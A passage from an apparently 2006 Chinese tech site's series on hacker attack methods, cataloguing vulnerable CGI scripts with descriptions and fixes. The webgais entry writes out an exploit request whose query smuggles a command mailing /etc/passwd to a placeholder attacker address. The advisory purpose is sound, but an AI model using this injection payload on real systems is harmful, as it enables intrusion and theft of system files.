会员名称:  密码:   验证码:     会员注册  忘记密码? 
设为首页
加入收藏
返回首页
媒体资讯>> 业界资讯 - 会展动态 - 竞赛&活动 - IT互联网  媒体学院>> 图形图像 - 网页制作 - 网络编程 - 数据库 - 服务器 - 网络应用  作品赏析>> 视频音响 - CG动画 - UI设计 - 平面设计 - 网页设计 - 摄影映象 - 三维2D - 其它设计  媒体工作室>> 视频影像 - 音频声响 - 三维2D - 平面视觉 - 软硬技术 - 摄影映象  人物访谈>> 人物访谈 - 华夏新锐  媒体杂志>> 媒体杂志  素材图库>> 丽景佳图 - 设计素材 - 资料图库 - 矢量图库 - 动态动画 - 特色图标  酷站赏析>> 韩国网站 - 国外网站 - 国内网站  会员中心>> 会员注册 - 会员登陆
会员服务区:我的主页 | 我的信箱 | 我的作品 | 我的文章 | 我的工作室 | 我的网摘 | 华夏媒体首页    
当前位置:华夏媒体 - > 媒体学院 - > 网络应用 - > 网络知识 - > 黑客攻防技术内幕-入侵者攻击方法(10)
   
   
   
黑客攻防技术内幕-入侵者攻击方法(10) 黑客攻防技术内...  [网络...]
More... 
   
网络协议X档案全集(十) 网络协议X档案...  [其它...]
不可忽视的BIOS参数设置 不可忽视的BIO...  [其它...]
微软IE浏览器非常规修改全攻略(上) 微软IE浏览器非...  [其它...]
微软IE浏览器非常规修改全攻略(下) 微软IE浏览器非...  [其它...]
网管十招 网管十招  [其它...]
微软安全问题 源自OS和IE中集成RSS 微软安全问题 ...  [其它...]
修改注册表使电脑更安全 修改注册表使电...  [其它...]
利用注册表管理IP地址 利用注册表管理...  [其它...]
有关IIS HACK的一些方法整理 有关IIS HACK的...  [其它...]
More 
黑客攻防技术内幕-入侵者攻击方法(10)
编辑:华夏媒体     作者:未知     来源:网络     时间:2006-07-29     总浏览量:3498
文字大小:[      ]     文字颜色:      双击滚屏/单击停止
[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [下一页] 

HTTP/1.0

      建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

      解决方法: 删除handler文件。

14. webgais

      类型: 攻击型

      风险等级:

      描述: /cgi-bin,目录下的webgaisGAIS搜索工具的一个接口,它有一个漏洞使入侵者可以绕过程序的安全机制,执行系统命令:

POST /cgi-bin/webgais HTTP/1.0

Content-length: 85 (replace this with the actual length of the "exploit" line)

telnet target.machine.com 80

query="mail+you\@your.host</etc/passwd;echo"&output=subject&domain=paragraph

      建议: 建议审核cgi-bin目录,避免有不必要的程序存在。

      解决方法: 删除webgais文件。


[上一页] [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [下一页] 
打印   收藏   关闭   至顶部  


关于我们 | 联系我们 | 合作伙伴 | 站点地图 | 免责声明 | 版权声明 | 意见建议
版权所有  Copyright © 2005-2006 华夏媒体(Media86.Com). All Rights Reserved .
网站备案号:粤ICP备06055307号